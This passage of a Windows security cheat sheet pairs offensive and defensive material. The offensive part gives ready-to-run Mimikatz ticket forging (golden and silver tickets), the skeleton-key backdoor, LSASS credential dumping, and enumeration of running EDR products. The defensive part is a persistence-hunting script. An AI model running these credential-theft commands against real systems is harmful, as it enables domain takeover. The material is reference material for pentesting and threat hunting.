kerberos::list
kerberos::list /export
kerberos::ptt ticket.kirbi

:: === GOLDEN TICKET ===
kerberos::golden /user:Administrator /domain:{domain} /sid:{domain_sid} /krbtgt:{krbtgt_hash} /id:500
kerberos::golden /user:Administrator /domain:{domain} /sid:{domain_sid} /krbtgt:{krbtgt_hash} /id:500 /ptt

:: === SILVER TICKET ===
kerberos::golden /user:Administrator /domain:{domain} /sid:{domain_sid} /target:{host} /service:cifs /rc4:{machine_hash} /ptt

:: === SKELETON KEY (domain persistence) ===
misc::skeleton

:: === CREDENTIAL MANAGER ===
vault::cred
vault::list

:: === MINIDUMP LSASS ===
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

## LSASS dump (without dropping Mimikatz)

```
# Task Manager -> Processes -> lsass.exe -> Create dump file
# Then load it in mimikatz: sekurlsa::minidump C:\Users\{user}\AppData\Local\Temp\lsass.DMP

# ProcDump (Microsoft-signed)
.\procdump.exe -ma lsass.exe lsass.dmp
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# PowerShell (comsvcs.dll)
$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $id C:\lsass.dmp full

# Load the dump in mimikatz
sekurlsa::minidump C:\lsass.dmp
sekurlsa::logonpasswords
```

## Post-exploitation enumeration

```
# === SYSTEM ===
systeminfo
hostname
whoami /all
net user
net localgroup administrators
ipconfig /all
arp -a
netstat -ano
route print

# === PROCESSES ===
tasklist /v
Get-Process | Select Name, Id, Path

# === DOMAIN ===
net user /domain
net group "Domain Admins" /domain
net group "Domain Controllers" /domain
nltest /domain_trusts

# === SHARES ===
net share
net view \\{host}

# === ANTIVIRUS / EDR ===
sc query windefend
Get-MpComputerStatus
tasklist | findstr /i "defender mssense cortana crowdstrike sentinel carbonblack cylance"

# === CLIPBOARD ===
Get-Clipboard

# === RECENT FILES ===
dir "$env:APPDATA\Microsoft\Windows\Recent" /b

# === BROWSER HISTORY ===
# Chrome
dir "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
# Firefox
dir "$env:APPDATA\Mozilla\Firefox\Profiles"
```

## Persistence threat-hunting cheat sheet

```
# === STARTUP / RUN KEYS ===
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location, User

# === SCHEDULED TASKS ===
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } | Format-Table TaskName, TaskPath, State
schtasks /query /fo LIST /v | findstr /i "system"
Get-ChildItem "C:\Windows\System32\Tasks\" -Recurse -File | Where-Object { $_.FullName -notlike "*Microsoft*" }

# === WINLOGON ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"

# === IFEO ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s

# === SERVICES ===
Get-Service | Where-Object {$_.StartType -eq "Automatic"} | Select Name, DisplayName, Status

# === WMI SUBSCRIPTIONS ===
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding

# === BITS JOBS ===
bitsadmin /list /allusers /verbose

# === APPINIT DLLs ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs

# === LSA / SSP ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"

# === AMSI PROVIDERS ===
reg query "HKLM\SOFTWARE\Microsoft\AMSI\Providers"

# === NETWORK PROVIDERS ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"

# === COM / HKCU OVERRIDES ===
reg query "HKCU\Software\Classes\CLSID" /s

# === COR_PROFILER ===
reg query "HKCU\Environment" /v COR_PROFILER_PATH
reg query "HKCU\Environment" /v COR_ENABLE_PROFILING

# === PRINT PROCESSORS ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors"

# === SHELL EXTENSIONS ===
reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"

# === CREDENTIAL PROVIDERS ===
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers"

# === WINSOCK LSP ===
netsh winsock show catalog

# === POWERSHELL PROFILE ===
cat "$HOME\Documents\WindowsPowerShell\profile.ps1"

# === USERS ===
net user
net localgroup "Administrators"

# === OBFUSCATED LOADER REGISTRY ===
reg query "HKCU\Software\Microsoft\WindowsUpdate"
reg query "HKCU\Software\Microsoft\Sync"
reg query "HKCU\Software\Microsoft\EdgeUpdate"
reg query "HKCU\Software\Microsoft\Cfg"
```

## Detection tool reference

| Tool | Purpose |
|------|---------|
| **Autoruns (Sysinternals)** | Complete persistence enumeration; the gold standard |
| **Process Monitor** | Live registry/file writes; phantom DLL hunting |
| **Sysmon** | Process creation, registry, DLL loads, network |
| **PrivescCheck** | Automated privilege escalation enumeration |
| **PowerUp** | PowerSploit privilege escalation module |
| **SharpUp** | C# privilege escalation checks (AV-friendly) |
| **LaZagne** | Multi-application credential recovery |
| **SessionGopher** | Session credential harvesting |
| **Mimikatz** | LSASS credential dumping, pass-the-hash / pass-the-ticket |
| **wes.py** | Windows Exploit Suggester (missing-patch analysis) |
| **accesschk.exe** | Permission audit of files, directories, registry keys and services |
| **bitsadmin /list** | BITS job enumeration |
| **netsh winsock show catalog** | LSP DLL enumeration |
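The hunting cheat sheet above is a list of `reg query` commands whose output still has to be read by eye. The following Python is an added example, not code from this repository: it parses `reg query` text (the sample is constructed to contain the artifacts of techniques 49, 51, 52 and 55, not captured from a real host) and applies the checks a hunter would run over it: LSA `Security Packages` / `Notification Packages` diffed against a baseline, `COR_ENABLE_PROFILING` set in a user environment, Run-key entries that go through a LOLBin host or live under a user-writable path, and svchost `ServiceDll` values outside `System32`. The baselines are assumptions for a default workstation (with `rassfm` allowed because domain controllers list it); hosts with third-party SSPs or password filters need their own.

```python
"""Hunt cheat-sheet persistence artifacts in `reg query` output (added example)."""
import re
from collections import defaultdict

# Constructed `reg query` output covering several of the techniques above (not from a real host)
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0payload
    Notification Packages    REG_MULTI_SZ    scecli

HKEY_CURRENT_USER\Environment
    COR_ENABLE_PROFILING    REG_SZ    1
    COR_PROFILER    REG_SZ    {FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}
    COR_PROFILER_PATH    REG_SZ    C:\lab\payload.dll
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SyncSvc    REG_SZ    rundll32.exe C:\lab\payload.dll,EntryPoint

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FakeSvc\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\lab\payload.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\system32\dhcpcore.dll
"""

# reg.exe prints values as 4 spaces, name, 4 spaces, type, 4 spaces, data
VALUE_RE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")

# Assumed baselines for a default workstation; adjust per fleet
BASELINE_SECURITY_PACKAGES = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"}
BASELINE_NOTIFICATION_PACKAGES = {"scecli", "rassfm"}  # rassfm is expected on domain controllers
LOLBIN_HOSTS = ("rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell")
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "c:\\lab\\")
SYSTEM32_PREFIXES = ("%systemroot%\\system32\\", "c:\\windows\\system32\\")


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}} from `reg query` output."""
    keys, current = defaultdict(dict), None
    for line in text.splitlines():
        if not line.strip():
            continue
        match = VALUE_RE.match(line)
        if match and current is not None:
            keys[current][match["name"]] = (match["type"], match["data"])
        elif line.startswith("HKEY_"):
            current = line.strip()
    return dict(keys)


def multi_sz(data):
    """reg.exe shows REG_MULTI_SZ entries joined by a literal backslash-zero."""
    return [part for part in data.split(r"\0") if part]


def hunt(keys):
    """Return (severity, key, value_name, reason) findings for the cheat-sheet locations."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        if k.endswith("\\control\\lsa"):
            for vname, baseline in (("Security Packages", BASELINE_SECURITY_PACKAGES),
                                    ("Notification Packages", BASELINE_NOTIFICATION_PACKAGES)):
                if vname in values:
                    extra = {p.lower() for p in multi_sz(values[vname][1])} - baseline
                    for pkg in sorted(extra):
                        findings.append(("high", key, vname, f"non-baseline LSA package '{pkg}'"))
        elif k.endswith("\\environment"):
            if values.get("COR_ENABLE_PROFILING", ("", ""))[1] == "1":
                path = values.get("COR_PROFILER_PATH", ("", "(no path)"))[1]
                findings.append(("high", key, "COR_PROFILER_PATH", f".NET profiler enabled: {path}"))
        elif k.endswith("\\currentversion\\run") or k.endswith("\\runonce"):
            for vname, (_t, data) in values.items():
                d = data.lower()
                if any(host in d for host in LOLBIN_HOSTS):
                    findings.append(("high", key, vname, f"LOLBin loader: {data}"))
                elif any(hint in d for hint in USER_WRITABLE_HINTS):
                    findings.append(("review", key, vname, f"autorun from user-writable path: {data}"))
        elif k.endswith("\\parameters") and "ServiceDll" in values:
            dll = values["ServiceDll"][1]
            if not dll.lower().startswith(SYSTEM32_PREFIXES):
                findings.append(("high", key, "ServiceDll", f"svchost ServiceDll outside System32: {dll}"))
    return findings


def count_by_severity(findings):
    counts = defaultdict(int)
    for severity, *_ in findings:
        counts[severity] += 1
    return dict(counts)


if __name__ == "__main__":
    for severity, key, vname, reason in hunt(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"[{severity}] {key} :: {vname} :: {reason}")
```

Run it against real output with `reg query ... /s > dump.txt` for each location in the cheat sheet and pass the file contents instead of `SAMPLE_REG_QUERY`; the `review` tier exists because legitimate per-user software (OneDrive in the sample) also autoruns from `AppData`, so only the LOLBin and LSA/ServiceDll hits are worth paging on.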